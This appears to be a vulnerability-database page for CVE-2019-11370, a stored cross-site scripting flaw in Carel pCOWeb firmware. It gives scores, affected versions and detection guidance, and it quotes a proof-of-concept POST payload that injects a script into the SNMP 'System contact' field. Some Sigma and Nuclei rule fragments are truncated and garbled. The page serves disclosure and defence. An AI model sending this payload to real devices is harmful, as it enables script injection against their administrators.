CVE-2019-11370
published 2019-06-03CVE-2019-11370: Stored XSS was discovered in Carel pCOWeb prior to B1.2.4, as demonstrated by the config/pw_snmp.html "System contact" field.
PriorityP278medium5.4CVSS 3.0
AVNACLPRLUIRSCCLILAN
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
3.98%
89.2th percentile
Stored XSS was discovered in Carel pCOWeb prior to B1.2.4, as demonstrated by the config/pw_snmp.html "System contact" field.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| carel | pcoweb_card_firmware | < b1.2.4 | b1.2.4 |
Detection & IOCsextracted from sources · hover to see the quote
command%3Fscript%3Asetdb%28%27snmp%27%2C%27syscontact%27%29=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E↗
sigma
title: Carel pCOWeb Stored XSS CVE-2019-11370
detection:
keywords:
- 'alert(document.domain)'
condition: and
# digest: 490a004630440220323529b4f284791ba73344bbfd89893004b000620e9b2cb098f4d694c00b752602201a1a5dfcd1dbd9e9868f40b5ae90c554548bc4812f63a052c40a0f70d7f73aa1:922c64590222798bb761d5b6d8e72950- →Monitor HTTP POST requests to /config/pw_snmp.html targeting the 'syscontact' parameter for script injection payloads (e.g., URL-encoded '<script>' tags or 'alert(' strings). ↗
- →The XSS payload is stored in the SNMP 'System contact' field; inspect stored values in that field for embedded script tags or JavaScript event handlers. ↗
- ·Vulnerability affects Carel pCOWeb firmware versions prior to B1.2.4 only; patched devices running B1.2.4 or later are not affected. ↗
CVSS provenance
nvdv3.05.4MEDIUMCVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
nvdv2.03.5LOWAV:N/AC:M/Au:S/C:N/I:P/A:N
vulncheck5.4MEDIUM
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-pfc4-fr5v-j7rh: Stored XSS was discovered in Carel pCOWeb prior to B1
ghsa_unreviewed·2022-05-24
CVE-2019-11370 [MEDIUM] CWE-79 GHSA-pfc4-fr5v-j7rh: Stored XSS was discovered in Carel pCOWeb prior to B1
Stored XSS was discovered in Carel pCOWeb prior to B1.2.4, as demonstrated by the config/pw_snmp.html "System contact" field.
VulnCheck
carel pcoweb_card_firmware Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
vulncheck·2019·CVSS 5.4
CVE-2019-11370 [MEDIUM] carel pcoweb_card_firmware Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
carel pcoweb_card_firmware Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
Stored XSS was discovered in Carel pCOWeb prior to B1.2.4, as demonstrated by the config/pw_snmp.html "System contact" field.
Affected: carel pcoweb_card_firmware
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2024-01-22&host_type=src&vulnerability=cve-2019-11370; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2024-01-23&host_type=src&vulnerability=cve-2019-11370; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?
No detection rules found.
Exploit-DB
Carel pCOWeb < B1.2.1 - Cross-Site Scripting
exploitdb·2019-05-22
CVE-2019-11370 Carel pCOWeb < B1.2.1 - Cross-Site Scripting
Carel pCOWeb Modem IP>/config/pw_snmp.html
# Send this post data:
%3Fscript%3Asetdb%28%27snmp%27%2C%27syscontact%27%29=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E
# The post data in URL decode format is:
?script:setdb('snmp','syscontact')=">alert(123)
Nuclei
Carel pCOWeb <B1.2.4 - Cross-Site Scripting
nuclei·CVSS 5.4
CVE-2019-11370 [MEDIUM] Carel pCOWeb <B1.2.4 - Cross-Site Scripting
Carel pCOWeb alert(document.domain)\">')
condition: and
# digest: 490a004630440220323529b4f284791ba73344bbfd89893004b000620e9b2cb098f4d694c00b752602201a1a5dfcd1dbd9e9868f40b5ae90c554548bc4812f63a052c40a0f70d7f73aa1:922c64590222798bb761d5b6d8e72950
No writeups or analysis indexed.
2019-06-03
Published
Exploited in the wild